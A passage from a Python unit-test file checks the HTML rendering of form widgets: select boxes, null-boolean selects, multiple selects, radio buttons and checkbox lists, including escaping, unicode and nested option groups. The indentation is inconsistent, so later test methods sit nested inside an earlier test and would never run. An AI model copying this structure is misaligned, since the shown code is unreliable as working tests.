self.assertTrue(value)
def test_select(self):
    """Select rendering: selected-option matching (by str() of the value),
    choices from render()/constructor/iterables/generators, escaping, and
    one-level nesting into <optgroup>s.

    Fix: a byte-identical duplicated assertHTMLEqual on the unbound
    SomeForm was removed.
    """
    w = Select()
    self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
    # If the value is None, none of the options are selected:
    self.assertHTMLEqual(w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
    # If the value corresponds to a label (but not to an option value), none of the options are selected:
    self.assertHTMLEqual(w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
    # Only one option can be selected, see #8103:
    self.assertHTMLEqual(w.render('choices', '0', choices=(('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))), """<select name="choices">
<option value="0" selected="selected">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="0">extra</option>
</select>""")
    # The value is compared to its str():
    self.assertHTMLEqual(w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
    self.assertHTMLEqual(w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
    self.assertHTMLEqual(w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
    # The 'choices' argument can be any iterable:
    from itertools import chain

    def get_choices():
        for i in range(5):
            yield (i, i)
    self.assertHTMLEqual(w.render('num', 2, choices=get_choices()), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
    things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})

    class SomeForm(Form):
        somechoice = ChoiceField(choices=chain((('', '-' * 9),), [(thing['id'], thing['name']) for thing in things]))
    f = SomeForm()
    self.assertHTMLEqual(f.as_table(), '<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>')
    f = SomeForm({'somechoice': 2})
    self.assertHTMLEqual(f.as_table(), '<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>')
    # You can also pass 'choices' to the constructor:
    w = Select(choices=[(1, 1), (2, 2), (3, 3)])
    self.assertHTMLEqual(w.render('num', 2), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
    # If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
    self.assertHTMLEqual(w.render('num', 2, choices=[(4, 4), (5, 5)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>""")
    # Choices are escaped correctly
    self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you &gt; me')))), """<select name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you &amp; me</option>
<option value="good">you &gt; me</option>
</select>""")
    # Unicode choices are correctly rendered as HTML
    self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>')
    # If choices is passed to the constructor and is a generator, it can be iterated
    # over multiple times without getting consumed:
    w = Select(choices=get_choices())
    self.assertHTMLEqual(w.render('num', 2), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
    self.assertHTMLEqual(w.render('num', 3), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>""")
    # Choices can be nested one level in order to create HTML optgroups:
    w.choices = (
        ('outer1', 'Outer 1'),
        ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))),
    )
    self.assertHTMLEqual(w.render('nestchoice', None), """<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
    self.assertHTMLEqual(w.render('nestchoice', 'outer1'), """<select name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
    self.assertHTMLEqual(w.render('nestchoice', 'inner1'), """<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
def test_nullbooleanselect(self):
    """NullBooleanSelect maps True/'2' -> Yes, False/'3' -> No, None -> Unknown.

    Fix: the first check used assertTrue(w.render(...), "<html>"), which
    passes the expected HTML as the assertion *message* and always succeeds
    for any non-empty render; it is now a real assertHTMLEqual.
    """
    w = NullBooleanSelect()
    self.assertHTMLEqual(w.render('is_cool', True), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>""")
    self.assertHTMLEqual(w.render('is_cool', False), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>""")
    self.assertHTMLEqual(w.render('is_cool', None), """<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>""")
    self.assertHTMLEqual(w.render('is_cool', '2'), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>""")
    self.assertHTMLEqual(w.render('is_cool', '3'), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>""")
    def test_selectmultiple(self):
        """SelectMultiple renders a <select multiple="multiple"> element,
        selecting every option whose value (compared via str()) appears in
        the list passed as the widget's value."""
        w = SelectMultiple()
        self.assertHTMLEqual(w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
        self.assertHTMLEqual(w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
        self.assertHTMLEqual(w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>""")
        # If the value is None, none of the options are selected:
        self.assertHTMLEqual(w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
        # If the value corresponds to a label (but not to an option value), none of the options are selected:
        self.assertHTMLEqual(w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
        # Multiple options (with the same value) can be selected, see #8103:
        self.assertHTMLEqual(w.render('choices', ['0'], choices=(('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))), """<select multiple="multiple" name="choices">
<option value="0" selected="selected">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="0" selected="selected">extra</option>
</select>""")
        # If multiple values are given, but some of them are not valid, the valid ones are selected:
        self.assertHTMLEqual(w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>""")
        # The value is compared to its str():
        self.assertHTMLEqual(w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
        self.assertHTMLEqual(w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
        self.assertHTMLEqual(w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
        # The 'choices' argument can be any iterable:
        def get_choices():
            for i in range(5):
                yield (i, i)
        self.assertHTMLEqual(w.render('nums', [2], choices=get_choices()), """<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
        # You can also pass 'choices' to the constructor:
        w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
        self.assertHTMLEqual(w.render('nums', [2]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
        # If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
        self.assertHTMLEqual(w.render('nums', [2], choices=[(4, 4), (5, 5)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>""")
        # Choices are escaped correctly
        self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you &gt; me')))), """<select multiple="multiple" name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you &amp; me</option>
<option value="good">you &gt; me</option>
</select>""")
        # Unicode choices are correctly rendered as HTML
        self.assertHTMLEqual(w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>')
        # Choices can be nested one level in order to create HTML optgroups:
        w.choices = (('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
        self.assertHTMLEqual(w.render('nestchoice', None), """<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
        self.assertHTMLEqual(w.render('nestchoice', ['outer1']), """<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
        self.assertHTMLEqual(w.render('nestchoice', ['inner1']), """<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
        self.assertHTMLEqual(w.render('nestchoice', ['outer1', 'inner2']), """<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group &quot;1&quot;">
<option value="inner1">Inner 1</option>
<option value="inner2" selected="selected">Inner 2</option>
</optgroup>
</select>""")
    def test_radioselect(self):
        """RadioSelect renders a <ul> of radio <input>s, checking the option
        whose value (compared via str()) equals the widget's value.
        Also covers 'choices' via constructor/render and 'attrs' id
        propagation to the individual inputs."""
        w = RadioSelect()
        self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
        # If the value is None, none of the options are checked:
        self.assertHTMLEqual(w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
        # If the value corresponds to a label (but not to an option value), none of the options are checked:
        self.assertHTMLEqual(w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
        # The value is compared to its str():
        self.assertHTMLEqual(w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
        # The 'choices' argument can be any iterable:
        def get_choices():
            for i in range(5):
                yield (i, i)
        self.assertHTMLEqual(w.render('num', 2, choices=get_choices()), """<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>""")
        # You can also pass 'choices' to the constructor:
        w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
        self.assertHTMLEqual(w.render('num', 2), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
        # If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
        self.assertHTMLEqual(w.render('num', 2, choices=[(4, 4), (5, 5)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>""")
        # Choices are escaped correctly
        w = RadioSelect()
        self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you &gt; me')))), """<ul>
<li><label><input type="radio" name="escape" value="bad" /> you &amp; me</label></li>
<li><label><input type="radio" name="escape" value="good" /> you &gt; me</label></li>
</ul>""")
        # Unicode choices are correctly rendered as HTML
        w = RadioSelect()
        self.assertHTMLEqual(six.text_type(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])), '<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>')
        # Attributes provided at instantiation are passed to the constituent inputs
        w = RadioSelect(attrs={'id': 'foo'})
        self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul id="foo">
<li><label for="foo_0"><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label for="foo_1"><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="foo_2"><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label for="foo_3"><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>""")
        # Attributes provided at render-time are passed to the constituent inputs
        w = RadioSelect()
        self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id': 'bar'}), """<ul id="bar">
<li><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>""")
    def test_radiofieldrenderer(self):
        """Exercises the RadioFieldRenderer protocol: iteration over the
        individual RadioChoiceInput subwidgets, index access, per-input
        attributes (name/value/choice_value/choice_label/is_checked),
        custom renderer classes, and the outer_html/inner_html hooks."""
        # RadioSelect uses a RadioFieldRenderer to render the individual radio inputs.
        # You can manipulate that object directly to customize the way the RadioSelect
        # is rendered.
        w = RadioSelect()
        r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
        # Collect the same inputs rendered four different ways in one pass.
        inp_set1 = []
        inp_set2 = []
        inp_set3 = []
        inp_set4 = []
        for inp in r:
            inp_set1.append(str(inp))
            inp_set2.append('%s<br />' % inp)
            inp_set3.append('<p>%s %s</p>' % (inp.tag(), inp.choice_label))
            inp_set4.append('%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked()))
        self.assertHTMLEqual('\n'.join(inp_set1), """<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
        self.assertHTMLEqual('\n'.join(inp_set2), """<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />""")
        self.assertHTMLEqual('\n'.join(inp_set3), """<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>""")
        self.assertHTMLEqual('\n'.join(inp_set4), """beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False""")
        # A RadioFieldRenderer object also allows index access to individual RadioChoiceInput
        w = RadioSelect()
        r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
        self.assertHTMLEqual(str(r[1]), '<label><input type="radio" name="beatle" value="P" /> Paul</label>')
        self.assertHTMLEqual(str(r[0]), '<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>')
        self.assertTrue(r[0].is_checked())
        self.assertFalse(r[1].is_checked())
        self.assertEqual((r[1].name, r[1].value, r[1].choice_value, r[1].choice_label), ('beatle', 'J', 'P', 'Paul'))
        # These individual widgets can accept extra attributes if manually rendered.
        self.assertHTMLEqual(
            r[1].render(attrs={'extra': 'value'}),
            '<label><input type="radio" extra="value" name="beatle" value="P" /> Paul</label>'
        )
        with self.assertRaises(IndexError):
            r[10]
        # You can create your own custom renderers for RadioSelect to use.
        class MyRenderer(RadioFieldRenderer):
            def render(self):
                return '<br />\n'.join(six.text_type(choice) for choice in self)
        w = RadioSelect(renderer=MyRenderer)
        self.assertHTMLEqual(w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
        # Or you can use custom RadioSelect fields that use your custom renderer.
        class CustomRadioSelect(RadioSelect):
            renderer = MyRenderer
        w = CustomRadioSelect()
        self.assertHTMLEqual(w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
        # You can customize rendering with outer_html/inner_html renderer variables (#22950)
        class MyRenderer(RadioFieldRenderer):
            outer_html = str('<div{id_attr}>{content}</div>')  # str is just to test some Python 2 issue with bytestrings
            inner_html = '<p>{choice_value}{sub_widgets}</p>'
        w = RadioSelect(renderer=MyRenderer)
        output = w.render('beatle', 'J',
            choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')),
            attrs={'id': 'bar'})
        self.assertIsInstance(output, SafeData)
        self.assertHTMLEqual(output, """<div id="bar">
<p><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></p>
<p><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></p>
<p><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></p>
<p><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></p>
</div>""")
    def test_nested_choices(self):
        """Nested (optgroup-style) choices render as nested <ul>s for both
        RadioSelect and CheckboxSelectMultiple, with hierarchical ids like
        media_1_0 derived from the widget's 'id' attr."""
        # Choices can be nested for radio buttons:
        w = RadioSelect()
        w.choices = (
            ('unknown', 'Unknown'),
            ('Audio', (('vinyl', 'Vinyl'), ('cd', 'CD'))),
            ('Video', (('vhs', 'VHS'), ('dvd', 'DVD'))),
        )
        self.assertHTMLEqual(w.render('nestchoice', 'dvd', attrs={'id': 'media'}), """<ul id="media">
<li><label for="media_0"><input id="media_0" name="nestchoice" type="radio" value="unknown" /> Unknown</label></li>
<li>Audio<ul id="media_1">
<li><label for="media_1_0"><input id="media_1_0" name="nestchoice" type="radio" value="vinyl" /> Vinyl</label></li>
<li><label for="media_1_1"><input id="media_1_1" name="nestchoice" type="radio" value="cd" /> CD</label></li>
</ul></li>
<li>Video<ul id="media_2">
<li><label for="media_2_0"><input id="media_2_0" name="nestchoice" type="radio" value="vhs" /> VHS</label></li>
<li><label for="media_2_1"><input checked="checked" id="media_2_1" name="nestchoice" type="radio" value="dvd" /> DVD</label></li>
</ul></li>
</ul>""")
        # Choices can be nested for checkboxes:
        w = CheckboxSelectMultiple()
        w.choices = (
            ('unknown', 'Unknown'),
            ('Audio', (('vinyl', 'Vinyl'), ('cd', 'CD'))),
            ('Video', (('vhs', 'VHS'), ('dvd', 'DVD'))),
        )
        self.assertHTMLEqual(w.render('nestchoice', ('vinyl', 'dvd'), attrs={'id': 'media'}), """<ul id="media">
<li><label for="media_0"><input id="media_0" name="nestchoice" type="checkbox" value="unknown" /> Unknown</label></li>
<li>Audio<ul id="media_1">
<li><label for="media_1_0"><input checked="checked" id="media_1_0" name="nestchoice" type="checkbox" value="vinyl" /> Vinyl</label></li>
<li><label for="media_1_1"><input id="media_1_1" name="nestchoice" type="checkbox" value="cd" /> CD</label></li>
</ul></li>
<li>Video<ul id="media_2">
<li><label for="media_2_0"><input id="media_2_0" name="nestchoice" type="checkbox" value="vhs" /> VHS</label></li>
<li><label for="media_2_1"><input checked="checked" id="media_2_1" name="nestchoice" type="checkbox" value="dvd" /> DVD</label></li>
</ul></li>
</ul>""")
    def test_checkboxselectmultiple(self):
        """CheckboxSelectMultiple renders a <ul> of checkbox <input>s,
        checking every option whose value (compared via str()) appears in
        the list passed as the widget's value; also covers per-input id
        generation and the renderer's iteration/index protocol."""
        w = CheckboxSelectMultiple()
        self.assertHTMLEqual(w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        # If the value is None, none of the options are selected:
        self.assertHTMLEqual(w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        # If the value corresponds to a label (but not to an option value), none of the options are selected:
        self.assertHTMLEqual(w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        # If multiple values are given, but some of them are not valid, the valid ones are selected:
        self.assertHTMLEqual(w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
        # The value is compared to its str():
